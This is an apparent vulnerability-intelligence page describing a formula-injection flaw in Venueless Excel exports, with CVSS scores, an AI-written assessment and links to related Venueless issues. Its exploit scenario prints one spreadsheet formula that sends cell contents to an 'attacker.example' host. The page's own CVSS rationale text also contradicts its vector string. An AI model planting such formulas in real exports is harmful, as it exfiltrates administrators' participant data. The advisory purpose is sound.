Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-delivered via web app, low complexity; PR:L for required account; UI:R for admin file open; S:C for formula execution in admin's spreadsheet environment; C:L for potential cell-data exfiltration.
Primary rating from Vendor (rami.io).
CVSS VectorVendor: rami.io
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Untrusted user data was passed verbatim to Excel exports for administrators. This allowed formula injection which can be used to compromise the environment of the user loading the file or other data in the file.
AnalysisAI
Formula injection in Venueless Excel exports allows an attacker with a low-privilege account to embed malicious spreadsheet formulas into user-supplied data fields, which execute when an administrator opens the generated export file. Affected deployments include all versions of Venueless (pretix) as indicated by the wildcard CPE entry. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a low-privilege authenticated account on the Venueless instance sufficient to submit data that is included in administrator-generated Excel exports (PR:L per CVSS vector). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 5.1 (Medium) is consistent with the constrained impact profile: the attack requires a low-privilege user account (PR:L) and passive administrator interaction (UI:P - the admin must export and open the file), and the direct integrity impact on the vulnerable system is rated Low (VI:L) with no confidentiality or availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers a low-privilege account on a Venueless instance and enters a crafted formula string such as =HYPERLINK("http://attacker.example/exfil?d="&ENCODEURL(A2),"click") into a user profile or event submission field. When a Venueless administrator later generates an Excel export of participant data and opens the file in Microsoft Excel, the formula is automatically evaluated, silently transmitting cell contents to the attacker's server. … |
| Remediation | Consult the vendor security advisory at https://github.com/venueless/venueless/security/advisories/GHSA-5hw3-655h-7m86 for the patched release version and upgrade instructions; no specific fixed version was confirmed in the data available at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Venueless instances allow authenticated users with 'update world' permissions to exfiltrate chat messages from direct me
Cross-world user deletion in venueless allows authenticated API users with 'manage users' permission in one world to del
Unvalidated redirect in Venueless social login allows phishing attacks by abusing the trusted domain reputation of legit
Incorrect authorization logic during room creation in Venueless permits authenticated low-privilege users to create room
Same weakness CWE-148 – Improper Neutralization of Input Leaders
View allSame technique Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38220